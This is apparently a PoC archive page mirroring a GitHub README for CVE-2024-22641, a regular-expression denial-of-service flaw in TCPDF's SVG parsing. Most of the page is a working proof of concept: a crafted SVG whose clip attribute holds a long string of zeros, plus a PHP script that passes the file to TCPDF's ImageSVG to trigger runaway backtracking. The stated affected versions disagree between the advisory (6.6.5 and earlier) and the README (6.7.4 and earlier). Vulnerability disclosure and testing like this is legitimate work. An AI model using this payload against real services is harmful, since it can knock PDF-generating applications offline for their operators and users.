Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2024-22641 PoC — TCPDF 安全漏洞

Source
https://github.com/zunak/CVE-2024-22641
Associated Vulnerability
Title:TCPDF 安全漏洞 (CVE-2024-22641)
Description:TCPDF version 6.6.5 and before is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file.
Readme
# CVE-2024-22641

#### Vulnerability Type
Regular expression Denial of Service (ReDoS)

#### Affected Product and Version
TCPDF <= 6.7.4

#### Attack Vector
TCPDF parse SVG file contain crafted payload.

#### Description
TCPDF version <= 6.7.4 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file.

#### PoC
```svg
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
```

```php
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>
```
> Note: Checking with **preg_last_error()** after the vulnerable line of code, the regEx will exit with **PREG_BACKTRACK_LIMIT_ERROR**.
File Snapshot

 [4.0K]  /data/pocs/c7d83480988df501ba46acd9a16bfbc9d8617177
└── [1.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →